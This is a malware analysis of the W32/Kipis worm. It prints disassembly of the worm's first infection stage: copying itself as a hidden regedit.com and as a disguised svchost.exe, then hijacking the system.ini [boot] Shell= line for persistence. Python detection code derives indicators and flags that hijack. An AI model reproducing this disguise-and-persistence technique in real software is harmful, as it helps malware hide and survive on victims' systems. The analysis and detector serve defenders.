After unpacking, the entry point looks like this:
.text:00401253 68 28 60 40 00 push offset dword_406028
.text:00401258 68 24 60 40 00 push offset dword_406024
.text:0040125D 68 20 60 40 00 push offset dword_406020
.text:00401262 E8 89 2E 00 00 call __GetMainArgs
.text:00401267 FF 35 28 60 40 00 push dword_406028
.text:0040126D FF 35 24 60 40 00 push dword_406024
.text:00401273 FF 35 20 60 40 00 push dword_406020
.text:00401279 89 25 14 60 40 00 mov dword_406014, esp
.text:0040127F E8 E4 2A 00 00 call sub_403D68 <--- follow this call; sub_403D68 is nothing more than four calls in sequence, one per stage of the infection:
.text:00403D68 E8 62 FE FF FF call sub_403BCF
.text:00403D6D E8 55 FF FF FF call sub_403CC7
.text:00403D72 E8 0D FE FF FF call sub_403B84
.text:00403D77 E8 8D FF FF FF call sub_403D09
In the first call (sub_403BCF):
The worm fetches the System directory (into PathName), the Windows directory (into FileName) and its own full path via GetModuleFileNameA (into ExistingFileName). It then copies itself to <Windows dir>\regedit.com (note that the destination buffer is the one filled by GetWindowsDirectoryA, so this copy lands in the Windows directory, not the System directory) and sets the copy's attributes to 6, which is FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_SYSTEM, so it does not show up in a normal directory listing.
Next it creates the directory <System dir>\1032 and copies itself there as svchost.exe, a name chosen to blend in with the legitimate service host process.
Finally it builds the string "Explorer.exe <System dir>\1032\svchost.exe" and writes it with WritePrivateProfileStringA as the Shell= value of the [boot] section of system.ini. On Windows 9x/Me the [boot] Shell= line names the program started as the user shell, so the dropped copy is launched alongside Explorer at every boot; this is the worm's persistence mechanism. Both CopyFileA calls pass bFailIfExists = 0, so existing copies are silently overwritten. (The listing renders the path separators as "//"; the Win32 file APIs accept either separator.)
The code:
.text:00403BD0 89 E5 mov ebp, esp
.text:00403BD2 81 EC 10 04 00 00 sub esp, 410h
.text:00403BD8 68 04 01 00 00 push 104h ; uSize
.text:00403BDD 8D 85 FC FE FF FF lea eax, [ebp+PathName]
.text:00403BE3 50 push eax ; lpBuffer
.text:00403BE4 E8 8B 02 00 00 call GetSystemDirectoryA
.text:00403BE9 68 04 01 00 00 push 104h ; uSize
.text:00403BEE 8D 85 F8 FD FF FF lea eax, [ebp+FileName]
.text:00403BF4 50 push eax ; lpBuffer
.text:00403BF5 E8 9E 02 00 00 call GetWindowsDirectoryA
.text:00403BFA 68 05 01 00 00 push 105h ; nSize
.text:00403BFF 8D 85 F3 FC FF FF lea eax, [ebp+ExistingFileName]
.text:00403C05 50 push eax ; lpFilename
.text:00403C06 6A 00 push 0 ; hModule
.text:00403C08 E8 43 02 00 00 call GetModuleFileNameA
.text:00403C0D 68 6B 6C 40 00 push offset aRegedit_com ; "//regedit.com"
.text:00403C12 8D 85 F8 FD FF FF lea eax, [ebp+FileName]
.text:00403C18 50 push eax
.text:00403C19 E8 82 03 00 00 call lstrcat
.text:00403C1E 6A 00 push 0 ; bFailIfExists
.text:00403C20 8D 85 F8 FD FF FF lea eax, [ebp+FileName]
.text:00403C26 50 push eax ; lpNewFileName
.text:00403C27 8D 85 F3 FC FF FF lea eax, [ebp+ExistingFileName]
.text:00403C2D 50 push eax ; lpExistingFileName
.text:00403C2E E8 7D 02 00 00 call CopyFileA
.text:00403C33 6A 06 push 6 ; dwFileAttributes
.text:00403C35 8D 85 F8 FD FF FF lea eax, [ebp+FileName]
.text:00403C3B 50 push eax ; lpFileName
.text:00403C3C E8 E7 02 00 00 call SetFileAttributesA
.text:00403C41 68 65 6C 40 00 push offset a1032 ; "//1032"
.text:00403C46 8D 85 FC FE FF FF lea eax, [ebp+PathName]
.text:00403C4C 50 push eax
.text:00403C4D E8 4E 03 00 00 call lstrcat
.text:00403C52 6A 00 push 0 ; lpSecurityAttributes
.text:00403C54 8D 85 FC FE FF FF lea eax, [ebp+PathName]
.text:00403C5A 50 push eax ; lpPathName
.text:00403C5B E8 8C 02 00 00 call CreateDirectoryA
.text:00403C60 68 58 6C 40 00 push offset aSvchost_exe ; "//svchost.exe"
.text:00403C65 8D 85 FC FE FF FF lea eax, [ebp+PathName]
.text:00403C6B 50 push eax
.text:00403C6C E8 2F 03 00 00 call lstrcat
.text:00403C71 6A 00 push 0 ; bFailIfExists
.text:00403C73 8D 85 FC FE FF FF lea eax, [ebp+PathName]
.text:00403C79 50 push eax ; lpNewFileName
.text:00403C7A 8D 85 F3 FC FF FF lea eax, [ebp+ExistingFileName]
.text:00403C80 50 push eax ; lpExistingFileName
.text:00403C81 E8 2A 02 00 00 call CopyFileA
.text:00403C86 68 4A 6C 40 00 push offset aExplorer_exe ; "Explorer.exe "
.text:00403C8B 8D 85 F3 FB FF FF lea eax, [ebp+String]
.text:00403C91 50 push eax
.text:00403C92 E8 21 03 00 00 call lstrcpy
.text:00403C97 8D 85 FC FE FF FF lea eax, [ebp+PathName]
.text:00403C9D 50 push eax
.text:00403C9E 8D 85 F3 FB FF FF lea eax, [ebp+String]
.text:00403CA4 50 push eax
.text:00403CA5 E8 F6 02 00 00 call lstrcat
.text:00403CAA 68 34 6C 40 00 push offset FileName ; "system.ini"
.text:00403CAF 8D 85 F3 FB FF FF lea eax, [ebp+String]
.text:00403CB5 50 push eax ; lpString
.text:00403CB6 68 3F 6C 40 00 push offset KeyName ; "Shell"
.text:00403CBB 68 45 6C 40 00 push offset AppName ; "boot"
.text:00403CC0 E8 CF 02 00 00 call WritePrivateProfileStringA
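To turn the listing above into something a responder can act on, here is an added example (my own code, not part of the original write-up or of the worm) that replays the lstrcat/CopyFileA sequence of sub_403BCF to derive the host indicators, decodes the dwFileAttributes value pushed before SetFileAttributesA, and checks a system.ini [boot] section for a hijacked Shell= line. It assumes the caller supplies the Windows and System directory names (on a live host these come from GetWindowsDirectory/GetSystemDirectory); the path separator is a parameter because the listing shows "//", which may be a rendering of a single backslash, and the Win32 file APIs accept either. The system.ini samples are constructed for the example.

```python
"""Added example: derive W32/Kipis host IOCs from the dropper logic and
detect the system.ini Shell= hijack it installs."""

import re

# FILE_ATTRIBUTE_* bits from winnt.h; the listing pushes 6 == HIDDEN | SYSTEM.
FILE_ATTRIBUTES = {
    0x01: "READONLY",
    0x02: "HIDDEN",
    0x04: "SYSTEM",
    0x10: "DIRECTORY",
    0x20: "ARCHIVE",
}


def decode_attrs(value):
    """Name the bits set in a dwFileAttributes value."""
    return [name for bit, name in sorted(FILE_ATTRIBUTES.items()) if value & bit]


def kipis_drop_iocs(windows_dir, system_dir, sep="\\"):
    """Replay the string building in sub_403BCF.

    FileName  = GetWindowsDirectoryA() + sep + "regedit.com"   (CopyFileA, attrs 6)
    PathName  = GetSystemDirectoryA()  + sep + "1032"          (CreateDirectoryA)
    PathName += sep + "svchost.exe"                            (CopyFileA)
    String    = "Explorer.exe " + PathName  -> system.ini [boot] Shell=
    """
    regedit_copy = windows_dir + sep + "regedit.com"
    drop_dir = system_dir + sep + "1032"
    svchost_copy = drop_dir + sep + "svchost.exe"
    return {
        "regedit_copy": regedit_copy,
        "regedit_attrs": decode_attrs(6),
        "drop_dir": drop_dir,
        "svchost_copy": svchost_copy,
        "system_ini": {"section": "boot", "key": "Shell",
                       "value": "Explorer.exe " + svchost_copy},
    }


def parse_ini(text):
    """Minimal parser for the section/key=value format that
    WritePrivateProfileStringA writes (keys and sections are case-insensitive)."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
        elif "=" in line and current is not None:
            key, _, val = line.partition("=")
            sections[current][key.strip().lower()] = val.strip()
    return sections


def shell_hijack(ini_text):
    """Return whatever follows Explorer.exe on the [boot] Shell= line (the
    worm appends its dropped path there), the whole value if Explorer.exe was
    replaced outright, or None when the line is absent or stock."""
    shell = parse_ini(ini_text).get("boot", {}).get("shell")
    if shell is None:
        return None
    m = re.match(r"\s*explorer\.exe\b\s*(.*)$", shell, re.IGNORECASE)
    if m is None:
        return shell
    extra = m.group(1).strip()
    return extra or None


# Constructed samples for the example, not captured from an infected host.
SAMPLE_INI = """; constructed system.ini after infection
[boot]
shell=Explorer.exe C:\\WINDOWS\\system32\\1032\\svchost.exe
[drivers]
wave=mmdrv.dll
"""
CLEAN_INI = "[boot]\nshell=Explorer.exe\n"


if __name__ == "__main__":
    for k, v in kipis_drop_iocs("C:\\WINDOWS", "C:\\WINDOWS\\system32").items():
        print(f"{k}: {v}")
    print("hijack:", shell_hijack(SAMPLE_INI))
    print("clean :", shell_hijack(CLEAN_INI))
```

The Shell= check deliberately keeps everything after the Explorer.exe token as one string rather than splitting on spaces, because the worm writes the dropped path unquoted and a System directory under a path containing spaces would otherwise be split in two.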
W32/Kipis Worm